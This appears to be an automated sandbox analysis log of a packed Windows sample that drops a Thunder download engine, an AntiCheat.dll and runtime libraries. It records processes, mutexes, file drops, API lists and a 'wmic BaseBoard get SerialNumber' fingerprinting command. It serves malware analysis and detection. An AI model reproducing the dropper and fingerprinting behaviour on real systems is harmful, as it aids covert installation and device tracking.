Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10049AB0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetModuleHandleA,GetProcAddress,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,GetVolumeInformationA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CreateFileA,SetFilePointer,SetEndOfFile,SetFileValidData,CloseHandle,GetLastError,SetEndOfFile,CloseHandle,CloseHandle,Sleep,15_2_10049AB0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_1001D704 __EH_prolog,InterlockedIncrement,InterlockedDecrement,RtlLeaveCriticalSection,CoInitializeEx,CoCreateInstance,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,RtlLeaveCriticalSection,GetTickCount,RtlLeaveCriticalSection,GetModuleHandleW,??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z,GetModuleFileNameW,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z,??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z,?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ,RtlLeaveCriticalSection,WaitForSingleObject,14_2_1001D704
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_100213BF lstrlenW,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,memcpy,FreeLibrary,14_2_100213BF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe File created: C:\Program Files (x86)\Skins
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe File created: C:\Users\user\Desktop\ExuiKrnln_Win32.lib
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeMutant created: \Sessions\1\BaseNamedObjects\F8730FC7_1436_4121_9FA6_C0FBF4817482
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMutant created: \Sessions\1\BaseNamedObjects\c:/users/user/appdata/local/temp/download/minithunderplatform.exe_mini_tp_connector_tpka_m_2013515_360_a
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeMutant created: \Sessions\1\BaseNamedObjects\c:/users/user/appdata/local/temp/download/minithunderplatform.exe_mini_tpka_m_2013515_360_a
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: VZ7xFmeuPX.exeReversingLabs: Detection: 79%
Source: MiniThunderPlatform.exeString found in binary or memory: -StartTP
Source: MiniThunderPlatform.exeString found in binary or memory: id-cmc-addExtensions
Source: MiniThunderPlatform.exeString found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe File read: C:\Users\user\Desktop\VZ7xFmeuPX.exe
Source: unknownProcess created: C:\Users\user\Desktop\VZ7xFmeuPX.exe "C:\Users\user\Desktop\VZ7xFmeuPX.exe"
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeProcess created: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumber
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe "C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msvcp71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msvcr71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: atl71.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: zlib1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: VZ7xFmeuPX.exeStatic file information: File size 28536832 > 1048576
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeFile opened: C:\Users\user\AppData\Local\Temp\download\MSVCR71.dllJump to behavior
Source: VZ7xFmeuPX.exeStatic PE information: Raw size of dVek is bigger than: 0x100000 < 0x1af2000
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X32.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415571391.00000000081FC000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415739688.0000000008368000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win32.lib.5.dr
Source: Binary string: atl71.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1620289287.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725957556.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, atl71.dll.7.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe, 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\xlbugreport\bin\ReleseDll.vc7\XLBugHandler.pdb source: XLBugHandler.dll.7.dr
Source: Binary string: msvcp71.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1726562366.000000007C3C1000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\concrt140.i386.pdb source: concrt140.dll.7.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140.dll.7.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X64.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win64.lib.5.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdbGCTL source: msvcp140_codecvt_ids.dll.7.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: api-ms-win-crt-string-l1-1-0.dll.7.dr
Source: Binary string: C:\Program Files (x86)\e\lib\ExuiKrnln\ExuiKrnln_X64.pdb& source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win64.lib.5.dr
Source: Binary string: ^msvcr71.pdb\ source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, msvcr71.dll.7.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: api-ms-win-crt-math-l1-1-0.dll.7.dr
Source: Binary string: atl71.pdbT source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1620289287.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725957556.000000007C12E000.00000002.00000001.01000000.00000016.sdmp, atl71.dll.7.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_atomic_wait.i386.pdb source: msvcp140_atomic_wait.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140_atomic_wait.i386.pdbGCTL source: msvcp140_atomic_wait.dll.7.dr
Source: Binary string: msvcr71.pdb0 source: MiniThunderPlatform.exe, 0000000E.00000002.1620716630.000000007C361000.00000040.00000001.01000000.00000012.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1726145069.000000007C361000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, dl_peer_id.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.7.dr
Source: Binary string: e:\code_svn\xl_framework\xl_component\minizip\Release\minizip.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.dr
Source: Binary string: cp71.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, msvcp71.dll.7.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\concrt140.i386.pdbGCTL source: concrt140.dll.7.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, dl_peer_id.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.7.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source: Binary string: msvcr71.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000E.00000002.1620716630.000000007C361000.00000040.00000001.01000000.00000012.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1726145069.000000007C361000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.7.dr
Source: vcruntime140.dll.7.drStatic PE information: 0x7EDF1B0D [Sun Jun 14 00:04:29 2037 UTC]
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00437770 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00437770
Source: initial sampleStatic PE information: section where entry point is pointing to: dVek
Source: VZ7xFmeuPX.exeStatic PE information: section name: Cqe3k
Source: VZ7xFmeuPX.exeStatic PE information: section name: QnWKdM
Source: VZ7xFmeuPX.exeStatic PE information: section name: kqUPd
Source: VZ7xFmeuPX.exeStatic PE information: section name: h4ls
Source: VZ7xFmeuPX.exeStatic PE information: section name: M1RF
Source: VZ7xFmeuPX.exeStatic PE information: section name: dVek
Source: VZ7xFmeuPX.exeStatic PE information: section name: 7pxja
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: mWevv
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: 54Faht
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: lATry
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: VCXJ
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: 3mVe
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: aHRy
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: A2p9f
Source: ExuiKrnln_Win64.lib.5.drStatic PE information: section name: _RDATA
Source: AntiCheat.dll.7.drStatic PE information: section name: .C
Source: AntiCheat.dll.7.drStatic PE information: section name: .(
Source: AntiCheat.dll.7.drStatic PE information: section name: .!
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C718CC6 push 7C844287h; mov dword ptr [esp], edi7_3_6C718D00
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6A0981 push 65037118h; mov dword ptr [esp], ebx7_3_6C6A09B7
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C714505 push 312A4696h; mov dword ptr [esp], eax7_3_6C78EEC0
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6EA3C4 push edx; mov dword ptr [esp], edx7_3_6C777EAF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C75FD52 push 65AC799Fh; mov dword ptr [esp], ebp7_3_6C75FD57
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C833639 push D7124F30h; mov dword ptr [esp], ebx7_3_6C83369F
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C71936C push 99288AAEh; mov dword ptr [esp], ebx7_3_6C76D18C
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90718A push ebp; iretd 14_3_0C90718B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A5C2 push edx; iretd 14_3_0C90A5C3
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A0CA push ebp; retn 0029h14_3_0C90A0CB
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A5F2 push esp; iretd 14_3_0C90A5F3
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C904557 push ebp; iretd 14_3_0C90457B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C905558 push edx; iretd 14_3_0C90555B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90555F push esi; iretd 14_3_0C90557B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A860 push es; iretd 14_3_0C90A863
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FD7F5 push esp; iretd 14_3_0C8FD803
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FEE02 push edx; retn 0032h14_3_0C8FEE03
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FD640 pushfd ; iretd 14_3_0C8FD643
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\zlibwapi.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe, File created: C:\Users\user\Desktop\ExuiKrnln_Win64.lib
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\Desktop\AntiCheat.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
